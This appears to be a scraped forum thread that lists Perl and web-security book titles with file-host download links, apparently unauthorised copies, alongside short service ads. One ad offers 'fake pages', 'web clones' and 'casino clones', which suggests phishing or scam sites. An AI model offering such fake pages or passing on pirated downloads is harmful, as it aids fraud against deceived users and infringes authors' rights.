    Perl Testing: A Developer's Notebook [2005]
    Practical mod_perl [2003]
    Pro Perl Debugging: From Professional to Expert [2005]
    Writing Perl Modules for CPAN [2002]
    Perl Medic: Transforming Legacy Code [2004]
    Perl Best Practices [2005]
    Effective Perl Programming: Ways to Write Better, More Idiomatic Perl (2nd Edition) [2010]
    request download ticket | Perl1.7z - ifile.it
    ---
    Beginning Perl [2000]
    Games Diversions & Perl Culture: Best of the Perl Journal [2004]
    Impatient Perl [2010]
    Intermediate Perl [2006]
    Learning Perl, Sixth Edition [2011]
    Learning Perl Objects, References & Modules [2003]
    Learning Perl on Win32 [1997]
    Learning Perl the Hard Way [2003]
    Modern Perl [2010]
    Object Oriented Perl [2000]
    Perl 5 Pocket Reference, 3rd Edition: Programming Tools [2000]
    Perl 6 and Parrot Essentials, 2nd Edition [2004]
    Perl Cookbook, 2nd Edition [2003]
    Perl Developer's Dictionary [2002]
    Perl for Beginners [2010]
    Perl Hacks [2006]
    Perl in a Nutshell, 2nd Edition [2002]
    Perl Power! - The Comprehensive Guide [2006]
    Perl Programmers Reference Guide [1998]
    Perl - The Complete Reference, 2nd Edition [2001]
    Professional Perl Programming [2001]
    Teach Yourself Perl in 24 Hours, 3rd Edition [2005]
    The Perl CD Bookshelf 4.0
    Wicked Cool Perl Scripts [2006]
    Automating Windows with Perl [1999]
    Minimal Perl For UNIX and Linux People [2007]
    Automating System Administration with Perl, 2nd Edition [2009]
    request download ticket | Perl2.7z - ifile.it
    ---
    Learning Perl/Tk [1999]
    Mastering Perl/Tk [2002]
    Graphics Programming with Perl [2002]
    Beginning Web Development with Perl: From Novice to Professional [2006]
    Catalyst 5.8 - The Perl MVC Framework [2009]
    Catalyst - Accelerating Perl Web Application Development [2007]
    MySQL and Perl for the Web [2001]
    Network Programming with Perl [2000]
    Perl & LWP [2002]
    Perl Database Programming [2003]
    Perl for Oracle DBAs [2002]
    Practical mod_perl [2003]
    Programming the Network With Perl [2002]
    Programming the Perl DBI [2000]
    Programming Web Services with Perl [2002]
    Spidering Hacks [2003]
    The Definitive Guide to Catalyst: Writing Extensible, Scalable, and Maintainable Perl-Based Web Applications [2009]
    Writing Apache Modules with Perl and C [1999]
    Data Munging with Perl [2001]
    Perl and XML [2002]
    Perl Template Toolkit [2003]
    Pro Perl Parsing [2005]
    Practical Text Mining With Perl [2008]
    Programming for Linguists: Perl for Language Researchers [2003]
    An Introduction to Language Processing with Perl and Prolog [2010]
    request download ticket | Perl3.7z - ifile.it
  18. I offer: - Web development services in the following environments: PHP, HTML, CSS, Javascript and MySQL. - Bot scripting (crawlers, automation of operations, interactions with various systems). I can guarantee quality and professionalism at affordable prices. If you are interested, leave a PM with your contact details.
  19. We build web applications, php, css3, html5, wordpress, joomla, magento, iphone, app clones, websites, fake pages, scripts, programs, web clones, casino clones, ./linux/cisco apps, etc. Seriousness. PM message on the rstcenter forum for details.
  20. A mixed bag: new and old / attack and defense / for developers, managers, testers / PHP, AJAX, Rails, Java, .NET, Oracle etc.
      Ajax Security [2007]
      Apache Security [2005]
      Applied Oracle Security: Developing Secure Database and Middleware Environments [2009]
      BackTrack 4: Assuring Security by Penetration Testing [2011]
      Beginning ASP.NET Security [2010]
      Core Security Patterns: Best Practices and Strategies for J2EE, Web Services, and Identity Management [2005]
      Cracking Drupal: A Drop in the Bucket [2009]
      Developer's Guide to Web Application Security [2007]
      E-Commerce: A Control and Security Guide [2004]
      Enterprise Web Services Security [2005]
      Essential PHP Security [2005]
      Expert Web Services Security in the .NET Platform [2004]
      request download ticket | ifile.it
      ---
      Google Hacking for Penetration Testers [2005]
      Google Hacking for Penetration Testers, Volume 2 [2007]
      Hacker Web Exploitation Uncovered [2005]
      Hacking Exposed Web 2.0 [2007]
      Hacking Exposed Web Applications, 3rd Edition [2011]
      HackNotes Web Security Pocket Reference [2003]
      Hack Proofing ColdFusion [2002]
      Hack Proofing Your E-Commerce Site [2001]
      Hack Proofing Your Web Applications [2001]
      How to Break Web Software: Functional and Security Testing of Web Applications and Web Services [2006]
      Implementing Database Security and Auditing: Includes Examples for Oracle, SQL Server, DB2 UDB, Sybase [2005]
      Joomla! Web Security [2008]
      Mastering Web Services Security [2003]
      ModSecurity 2.5 [2009]
      ModSecurity Handbook [2010]
      Oracle Security [1998]
      php architect's Guide to PHP Security [2005]
      Practical Oracle Security: Your Unauthorized Guide to Relational Database Security [2007]
      request download ticket | ifile.it
      ---
      Preventing Web Attacks with Apache [2006]
      Pro PHP Security: From Application Security Principles to the Implementation of XSS Defenses, Second Edition [2010]
      Secure E-Government Web Services [2005]
      Securing PHP Web Applications [2009]
      Security for Web Services and Service-Oriented Architectures [2009]
      Security Fundamentals for E-Commerce [2002]
      Security on Rails [2009]
      Security Technologies for the World Wide Web, Second Edition [2002]
      Seven Deadliest Web Application Attacks [2010]
      SQL Injection Attacks and Defense [2009]
      SQL Server Security Distilled [2004]
      SSL & TLS Essentials: Securing the Web [2000]
      The Oracle Hacker's Handbook: Hacking and Defending Oracle [2007]
      The Web Application Hacker's Handbook: Discovering and Exploiting Security Flaws [2007]
      The Database Hacker's Handbook: Defending Database Servers [2005]
      Web 2.0 Security - Defending AJAX, RIA, AND SOA [2007]
      Web Application Vulnerabilities: Detect, Exploit, Prevent [2007]
      Web Hacking: Attacks and Defense [2002]
      Web Security, Privacy and Commerce, 2nd Edition [2002]
      Web Security Testing Cookbook: Systematic Techniques to Find Problems Fast [2008]
      Web Services Security [2003]
      XML Security [2002]
      XSS Exploits and Defense [2007]
      request download ticket | ifile.it
  21. As the title says, I'm selling a script similar to the one on WTA, GTop, or WTStats.com, which is a web traffic analysis and statistics script. What does the script do? It monitors the traffic of the registered sites, both unique visits and page views, and also gives details about the following:
      - Browsers (top 10 most used browsers - can be changed to more or fewer)
      - Countries - shows which country most visitors come from (comes with a chart via the Google API)
      - Operating Systems - Top operating systems
      - Best referrers - Shows which site is the best referrer
      - Most used resolutions - Top 10 resolutions used by visitors
      - Last 10 visitors - Shows the last 10 visitors who accessed the site, including browser, operating system, resolution, referrer, and the time and date at which the visitor came in.
      - Best keywords - Shows the best keywords through which a visitor reaches the monitored site (from search engines).
      The script is very flexible; nearly all of the above can be printed on charts.
      "Features":
      - Registration with reCaptcha
      - Private statistics for registered users (all statistics can be made private)
      - jQuery UI integrated into the theme I give by default; I'm selling the script, not the theme, but it comes with a theme similar to the one on livestats.ro
      - Multiple images - You can put as many images as you want in the user panel; by image I mean the code that appears on the user's site together with an image (different colors and all that stuff).
      Installation: Installation steps are included; I can do it for a fee of 3e (euro).
      Support: I offer support for the script only if it has not been modified from its initial state; if it's modified, that's your business.
      I accept payment only via PayPal; the price is 5e (euro). The script can be bought from here: WTstats Script, and the demo is here: Demo